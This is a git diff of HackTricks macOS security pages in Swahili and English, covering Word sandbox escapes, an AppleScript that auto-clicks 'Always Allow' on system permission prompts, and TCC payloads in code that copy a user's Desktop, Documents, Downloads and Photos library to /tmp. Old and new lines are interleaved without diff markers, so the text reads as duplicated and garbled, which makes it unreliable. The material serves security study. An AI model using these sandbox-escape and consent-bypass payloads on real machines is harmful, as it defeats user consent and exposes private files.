* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Kwenye ukurasa huu unaweza kupata jinsi ya kuunda programu ya kuzindua amri za aina yoyote kutoka ndani ya sanduku la kimsingi la macOS:
Katika ukurasa huu unaweza kupata jinsi ya kuunda programu ya kuzindua amri za kawaida kutoka ndani ya sanduku la kawaida la macOS:
1. Sakinisha programu:
1. Jenga programu:
{% code title="main.m" %}
```objectivec
@ -50,9 +51,9 @@ return 0;
```
{% endcode %}
Jenga kwa kukimbia: `clang -framework Foundation -o SandboxedShellApp main.m`
Ili kuijenga, tumia: `clang -framework Foundation -o SandboxedShellApp main.m`
2. Jenga mfuko wa `.app`
2. Jenga kifurushi cha `.app`
```bash
mkdir -p SandboxedShellApp.app/Contents/MacOS
mv SandboxedShellApp SandboxedShellApp.app/Contents/MacOS/
@ -74,7 +75,7 @@ cat << EOF > SandboxedShellApp.app/Contents/Info.plist
</plist>
EOF
```
3. Taja haki za kibali
3. Tafsiri haki
{% tabs %}
{% tab title="sandbox" %}
@ -92,7 +93,7 @@ EOF
```
{% endtab %}
{% tab title="sandbox + downloads" %}sandbox + kupakua{% endtab %}
{% tab title="sandbox + downloads" %}
```bash
cat << EOF > entitlements.plist
<?xml version="1.0" encoding="UTF-8"?>
@ -110,7 +111,7 @@ EOF
{% endtab %}
{% endtabs %}
4. Saini programu (unahitaji kuunda cheti katika keychain)
4. Saini programu (unahitaji kuunda cheti katika ufunguo)
```bash
codesign --entitlements entitlements.plist -s "YourIdentity" SandboxedShellApp.app
./SandboxedShellApp.app/Contents/MacOS/SandboxedShellApp
@ -118,16 +119,17 @@ codesign --entitlements entitlements.plist -s "YourIdentity" SandboxedShellApp.a
# An d in case you need this in the future
codesign --remove-signature SandboxedShellApp.app
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

71
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md
View file

@ -1,66 +1,63 @@
# Kuepuka Sanduku la Mchanga la macOS Office
# macOS Office Sandbox Bypasses
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
### Kuepuka Sanduku kwa Neno kwa Kutumia Mawakala wa Kuanzisha
### Word Sandbox bypass via Launch Agents
Programu hutumia **Sanduku la Mchanga la desturi** kwa kutumia ruhusu **`com.apple.security.temporary-exception.sbpl`** na sanduku hili la desturi linaruhusu kuandika faili popote ikiwa jina la faili linaanza na `~$`: `(hitaji-moja-kwa-moja (hitaji-yote (aina-ya-vnode REGULAR-FILE) (regex #"(^|/)~$[^/]+$")))`
Programu inatumia **Sandbox maalum** kwa kutumia haki **`com.apple.security.temporary-exception.sbpl`** na sandbox hii maalum inaruhusu kuandika faili popote mradi jina la faili linapoanza na `~$`: `(require-any (require-all (vnode-type REGULAR-FILE) (regex #"(^|/)~$[^/]+$")))`
Kwa hivyo, kuepuka kulikuwa rahisi kama **kuandika `plist`** ya LaunchAgent katika `~/Library/LaunchAgents/~$escape.plist`.
Hivyo, kutoroka ilikuwa rahisi kama **kuandika `plist`** LaunchAgent katika `~/Library/LaunchAgents/~$escape.plist`.
Angalia [**ripoti ya asili hapa**](https://www.mdsec.co.uk/2018/08/escaping-the-sandbox-microsoft-office-on-macos/).
Check the [**original report here**](https://www.mdsec.co.uk/2018/08/escaping-the-sandbox-microsoft-office-on-macos/).
### Kuepuka Sanduku kwa Neno kwa Kutumia Vitu vya Kuingia na zip
### Word Sandbox bypass via Login Items and zip
Kumbuka kwamba kutoka kwa kuepuka kwanza, Neno linaweza kuandika faili za aina yoyote ambazo jina lake linaanza na `~$` ingawa baada ya kurekebisha kasoro ya awali haikuwezekana kuandika katika `/Library/Application Scripts` au katika `/Library/LaunchAgents`.
Kumbuka kwamba kutoka kutoroka kwa kwanza, Word inaweza kuandika faili zisizo na mpangilio ambazo jina lake linaanza na `~$` ingawa baada ya patch ya udhaifu wa awali haikuwezekana kuandika katika `/Library/Application Scripts` au katika `/Library/LaunchAgents`.
Iligunduliwa kwamba kutoka ndani ya sanduku la mchanga ni **inawezekana kuunda Kipengele cha Kuingia** (programu ambazo zitatekelezwa wakati mtumiaji anajiingia). Walakini, programu hizi **hazitafanya kazi isipokuwa** zime **sainiwa** na **haiwezekani kuongeza args** (kwa hivyo huwezi tu kukimbia kitanzi cha nyuma kwa kutumia **`bash`**).
Iligundulika kwamba kutoka ndani ya sandbox inawezekana kuunda **Kitu cha Kuingia** (programu ambazo zitatekelezwa wakati mtumiaji anapoingia). Hata hivyo, programu hizi **hazitaweza kutekelezwa isipokuwa** hazijakuwa **notarized** na **haiwezekani kuongeza args** (hivyo huwezi tu kuendesha shell ya kinyume kwa kutumia **`bash`**).
Kutoka kwa kuepuka kwa sanduku la mchanga hapo awali, Microsoft ilizima chaguo la kuandika faili katika `~/Library/LaunchAgents`. Walakini, iligunduliwa kwamba ikiweka **faili ya zip kama Kipengele cha Kuingia** `Archive Utility` itaifungua tu katika eneo lake la sasa. Kwa hivyo, kwa sababu kwa chaguo-msingi saraka ya `LaunchAgents` kutoka `~/Library` haijaundwa, ilikuwa inawezekana **kuzipisha plist katika `LaunchAgents/~$escape.plist`** na **kuweka** faili ya zip katika **`~/Library`** ili wakati wa kuzipua itafikia marudio ya uthabiti.
Kutoka kwa kutoroka kwa Sandbox ya awali, Microsoft ilizima chaguo la kuandika faili katika `~/Library/LaunchAgents`. Hata hivyo, iligundulika kwamba ikiwa utaweka **faili ya zip kama Kitu cha Kuingia** `Archive Utility` itachambua tu **zip** katika eneo lake la sasa. Hivyo, kwa sababu kwa kawaida folda `LaunchAgents` kutoka `~/Library` haijaundwa, ilikuwa inawezekana **kuzipa plist katika `LaunchAgents/~$escape.plist`** na **kuiweka** faili ya zip katika **`~/Library`** ili wakati wa kufungua itafikia mahali pa kudumu.
Angalia [**ripoti ya asili hapa**](https://objective-see.org/blog/blog\_0x4B.html).
Check the [**original report here**](https://objective-see.org/blog/blog\_0x4B.html).
### Kuepuka Sanduku kwa Neno kwa Kutumia Vitu vya Kuingia na .zshenv
### Word Sandbox bypass via Login Items and .zshenv
(Kumbuka kwamba kutoka kwa kuepuka kwanza, Neno linaweza kuandika faili za aina yoyote ambazo jina lake linaanza na `~$`).
(Kumbuka kwamba kutoka kutoroka kwa kwanza, Word inaweza kuandika faili zisizo na mpangilio ambazo jina lake linaanza na `~$`).
Walakini, mbinu ya awali ilikuwa na kizuizi, ikiwa saraka ya **`~/Library/LaunchAgents`** ipo kwa sababu programu nyingine iliiunda, itashindwa. Kwa hivyo, mlolongo tofauti wa Vitu vya Kuingia uligunduliwa kwa hii.
Hata hivyo, mbinu ya awali ilikuwa na kikomo, ikiwa folda **`~/Library/LaunchAgents`** ipo kwa sababu programu nyingine iliiunda, ingekuwa na shida. Hivyo, mnyororo tofauti wa Kitu cha Kuingia uligundulika kwa hili.
Mshambuliaji angeweza kuunda faili za **`.bash_profile`** na **`.zshenv`** na mzigo wa kutekeleza kisha kuzipisha na **kuandika zip katika saraka ya mtumiaji wa waathirika**: **`~/~$escape.zip`**.
Mshambuliaji angeweza kuunda faili **`.bash_profile`** na **`.zshenv`** zikiwa na payload ya kutekeleza na kisha kuzipa na **kuandika zip katika** folda ya mtumiaji wa wahanga: **`~/~$escape.zip`**.
Kisha, ongeza faili ya zip kwa **Vitu vya Kuingia** na kisha programu ya **`Terminal`**. Wakati mtumiaji anapoingia tena, faili ya zip itafunguliwa katika faili za mtumiaji, ikibadilisha **`.bash_profile`** na **`.zshenv`** na kwa hivyo, terminal itatekeleza moja ya faili hizi (kulingana na ikiwa bash au zsh inatumika).
Kisha, ongeza faili ya zip kwenye **Kitu cha Kuingia** na kisha programu ya **`Terminal`**. Wakati mtumiaji anapoingia tena, faili ya zip itafunguliwa katika faili za watumiaji, ikipunguza **`.bash_profile`** na **`.zshenv`** na hivyo, terminal itatekeleza moja ya faili hizi (kulingana na ikiwa bash au zsh inatumika).
Angalia [**ripoti ya asili hapa**](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c).
Check the [**original report here**](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c).
### Kuepuka Sanduku la Mchanga kwa Neno kwa Kutumia Open na mazingira ya env
### Word Sandbox Bypass with Open and env variables
Kutoka kwa michakato iliyowekwa sandukuni, bado inawezekana kuamsha michakato mingine kwa kutumia zana ya **`open`**. Zaidi ya hayo, michakato hii itaendeshwa **ndani ya sanduku yao wenyewe la mchanga**.
Kutoka kwa michakato ya sandboxed bado inawezekana kuita michakato mingine kwa kutumia **`open`** utility. Zaidi ya hayo, michakato hii itakimbia **ndani ya sandbox yao wenyewe**.
Iligunduliwa kwamba zana ya open ina chaguo la **`--env`** kuendesha programu na **mazingira maalum** ya env. Kwa hivyo, ilikuwa inawezekana kuunda faili ya **`.zshenv`** ndani ya saraka **ndani** ya **sanduku la mchanga** na kutumia `open` na `--env` kuweka **mazingira ya `HOME`** kwa saraka hiyo ikifungua programu ya `Terminal`, ambayo itatekeleza faili ya `.zshenv` (kwa sababu fulani pia ilikuwa ni lazima kuweka variable `__OSINSTALL_ENVIROMENT`).
Iligundulika kwamba utility ya open ina chaguo la **`--env`** kuendesha programu na **mabadiliko maalum**. Hivyo, ilikuwa inawezekana kuunda **faili ya `.zshenv`** ndani ya folda **ndani** ya **sandbox** na kutumia `open` na `--env` kuweka **`HOME` variable** kwa folda hiyo ikifungua programu hiyo ya `Terminal`, ambayo itatekeleza faili ya `.zshenv` (kwa sababu fulani ilikuwa pia inahitajika kuweka mabadiliko `__OSINSTALL_ENVIROMENT`).
Angalia [**ripoti ya asili hapa**](https://perception-point.io/blog/technical-analysis-of-cve-2021-30864/).
Check the [**original report here**](https://perception-point.io/blog/technical-analysis-of-cve-2021-30864/).
### Kuepuka Sanduku la Mchanga kwa Neno kwa Kutumia Open na stdin
### Word Sandbox Bypass with Open and stdin
Zana ya **`open`** pia ilisaidia paramu ya **`--stdin`** (na baada ya kuepuka hapo awali haikuwezekana tena kutumia `--env`).
Utility ya **`open`** pia ilisaidia param ya **`--stdin`** (na baada ya kutoroka kwa awali haikuwezekana tena kutumia `--env`).
Jambo ni kwamba hata ikiwa **`python`** ilisainiwa na Apple, **haitatekeleza** skripti na sifa ya **`karantini`**. Walakini, ilikuwa inawezekana kuipitisha skripti kutoka kwa stdin ili isichunguze ikiwa ilikuwa imekarantiniwa au la:&#x20;
Jambo ni kwamba hata kama **`python`** ilitiwa saini na Apple, **haitatekeleza** script yenye sifa ya **`quarantine`**. Hata hivyo, ilikuwa inawezekana kupitisha script kutoka stdin hivyo haitakagua ikiwa ilikuwa imewekwa karantini au la:&#x20;
1. Weka faili ya **`~$exploit.py`** na amri za Python za hiari.
2. Chalua _open_ **`stdin='~$exploit.py' -a Python`**, ambayo inatekeleza programu ya Python na faili yetu iliyowekwa kama kuingia kawaida. Python inatekeleza kwa furaha nambari yetu, na kwa kuwa ni mchakato wa mtoto wa _launchd_, haifungwi na sheria za sanduku la mchanga la Neno.
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
1. Angusha faili **`~$exploit.py`** yenye amri za Python zisizo na mpangilio.
2. Kimbia _open_ **`stdin='~$exploit.py' -a Python`**, ambayo inakimbia programu ya Python na faili yetu iliyotupwa ikihudumu kama ingizo lake la kawaida. Python kwa furaha inakimbia msimbo wetu, na kwa kuwa ni mchakato wa mtoto wa _launchd_, haifungwi na sheria za sandbox za Word.

54
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md
View file

@ -1,54 +1,56 @@
# Skripti za Apple kwenye macOS
# macOS Apple Scripts
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Skripti za Apple
## Apple Scripts
Hii ni lugha ya skripti inayotumiwa kwa **utomatishaji wa kazi** kwa **kuingiliana na michakato ya mbali**. Inafanya iwe rahisi **kuomba michakato mingine kutekeleza baadhi ya hatua**. **Programu hasidi** inaweza kutumia vipengele hivi kudhuru kazi zinazotolewa na michakato mingine.\
Kwa mfano, programu hasidi inaweza **kuingiza msimbo wa JS usiojulikana kwenye kurasa zilizofunguliwa kwenye kivinjari**. Au **bonyeza moja kwa moja** ruhusa zinazoruhusiwa zinazohitajika na mtumiaji.
Ni lugha ya skripti inayotumika kwa otomatiki ya kazi **kuingiliana na michakato ya mbali**. Inafanya iwe rahisi **kuomba michakato mingine kutekeleza vitendo vingine**. **Malware** inaweza kutumia vipengele hivi kuboresha kazi zinazotolewa na michakato mingine.\
Kwa mfano, malware inaweza **kuingiza msimbo wa JS wa kiholela katika kurasa zilizofunguliwa za kivinjari**. Au **kubonyeza kiotomatiki** baadhi ya ruhusa zinazohitajika kwa mtumiaji;
```applescript
tell window 1 of process "SecurityAgent"
click button "Always Allow" of group 1
end tell
```
Hapa una mifano kadhaa: [https://github.com/abbeycode/AppleScripts](https://github.com/abbeycode/AppleScripts)\
Pata habari zaidi kuhusu programu hasidi zinazotumia AppleScripts [**hapa**](https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/).
Here you have some examples: [https://github.com/abbeycode/AppleScripts](https://github.com/abbeycode/AppleScripts)\
Find more info about malware using applescripts [**here**](https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/).
Skripti za Apple zinaweza kuwa rahisi "**kukusanywa**". Toleo hizi zinaweza kuwa rahisi "**kukusanywa upya**" na `osadecompile`
Apple scripts yanaweza "kukatwa" kwa urahisi. Matoleo haya yanaweza "kufutwa" kwa urahisi na `osadecompile`
Hata hivyo, skripti hizi pia zinaweza **kuwa zimehifadhiwa kama "Soma tu"** (kupitia chaguo la "Hifadhi..."):
Hata hivyo, skripti hizi zinaweza pia **kuzalishwa kama "Soma tu"** (kupitia chaguo la "Zalisha..."):
<figure><img src="https://github.com/carlospolop/hacktricks/raw/master/.gitbook/assets/image%20(556).png" alt=""><figcaption></figcaption></figure>
```
file mal.scpt
mal.scpt: AppleScript compiled
```
Na katika kesi hii, yaliyomo hayawezi kuchambuliwa hata na `osadecompile`
na katika kesi hii maudhui hayawezi kufanywa decompiled hata kwa `osadecompile`
Hata hivyo, bado kuna zana kadhaa ambazo zinaweza kutumika kuelewa programu hizi, [**soma utafiti huu kwa maelezo zaidi**](https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/)). Zana [**applescript-disassembler**](https://github.com/Jinmo/applescript-disassembler) pamoja na [**aevt\_decompile**](https://github.com/SentineLabs/aevt\_decompile) itakuwa muhimu sana kuelewa jinsi skripti inavyofanya kazi.
Hata hivyo, bado kuna zana ambazo zinaweza kutumika kuelewa aina hii ya executable, [**soma utafiti huu kwa maelezo zaidi**](https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/)). Zana [**applescript-disassembler**](https://github.com/Jinmo/applescript-disassembler) pamoja na [**aevt\_decompile**](https://github.com/SentineLabs/aevt\_decompile) itakuwa muhimu sana kuelewa jinsi script inavyofanya kazi.
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki hila za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

139
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md
View file

@ -1,28 +1,28 @@
# macOS TCC Payloads
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
### Desktop
* **Uhalali**: Hakuna
* **Entitlement**: Hakuna
* **TCC**: kTCCServiceSystemPolicyDesktopFolder
{% tabs %}
{% tab title="ObjetiveC" %}
Nakili `$HOME/Desktop` hadi `/tmp/desktop`.
Copy `$HOME/Desktop` to `/tmp/desktop`.
```objectivec
#include <syslog.h>
#include <stdio.h>
@ -58,7 +58,6 @@ fclose(stderr); // Close the file stream
{% tab title="Shell" %}
Nakili `$HOME/Desktop` hadi `/tmp/desktop`.
```bash
cp -r "$HOME/Desktop" "/tmp/desktop"
```
@ -67,15 +66,12 @@ cp -r "$HOME/Desktop" "/tmp/desktop"
### Nyaraka
* **Entitlement**: Hakuna
* **Haki**: Hakuna
* **TCC**: `kTCCServiceSystemPolicyDocumentsFolder`
{% tabs %}
{% tab title="undefined" %}
{% tab title="ObjetiveC" %}
Nakili `$HOME/Documents` hadi `/tmp/documents`.
{% endtab %}
{% tab title="undefined" %}
```objectivec
#include <syslog.h>
#include <stdio.h>
@ -111,24 +107,20 @@ fclose(stderr); // Close the file stream
{% tab title="Shell" %}
Nakili `$HOME/`Documents hadi `/tmp/documents`.
```bash
cp -r "$HOME/Documents" "/tmp/documents"
```
{% endtab %}
{% endtabs %}
### Vipakuzi
### Downloads
* **Uhalali**: Hakuna
* **Entitlement**: Hakuna
* **TCC**: `kTCCServiceSystemPolicyDownloadsFolder`
{% tabs %}
{% tab title="undefined" %}
{% tab title="ObjetiveC" %}
Nakili `$HOME/Downloads` hadi `/tmp/downloads`.
{% endtab %}
{% tab title="undefined" %}
```objectivec
#include <syslog.h>
#include <stdio.h>
@ -163,8 +155,7 @@ fclose(stderr); // Close the file stream
{% endtab %}
{% tab title="Shell" %}
Nakili `$HOME/Downloads` kwenda `/tmp/downloads`.
Nakili `$HOME/Dowloads` hadi `/tmp/downloads`.
```bash
cp -r "$HOME/Downloads" "/tmp/downloads"
```
@ -173,15 +164,12 @@ cp -r "$HOME/Downloads" "/tmp/downloads"
### Maktaba ya Picha
* **Uwezo**: `com.apple.security.personal-information.photos-library`
* **Haki**: `com.apple.security.personal-information.photos-library`
* **TCC**: `kTCCServicePhotos`
{% tabs %}
{% tab title="undefined" %}
{% tab title="ObjetiveC" %}
Nakili `$HOME/Pictures/Photos Library.photoslibrary` hadi `/tmp/photos`.
{% endtab %}
{% tab title="undefined" %}
```objectivec
#include <syslog.h>
#include <stdio.h>
@ -216,23 +204,21 @@ fclose(stderr); // Close the file stream
{% endtab %}
{% tab title="Shell" %}
Nakili `$HOME/Pictures/Photos Library.photoslibrary` kwenda `/tmp/photos`.
Nakili `$HOME/Pictures/Photos Library.photoslibrary` hadi `/tmp/photos`.
```bash
cp -r "$HOME/Pictures/Photos Library.photoslibrary" "/tmp/photos"
```
{% endtab %}
{% endtabs %}
### Wasiliana
### Mawasiliano
* **Uwezo**: `com.apple.security.personal-information.addressbook`
* **Ruhusa**: `com.apple.security.personal-information.addressbook`
* **TCC**: `kTCCServiceAddressBook`
{% tabs %}
{% tab title="ObjetiveC" %}
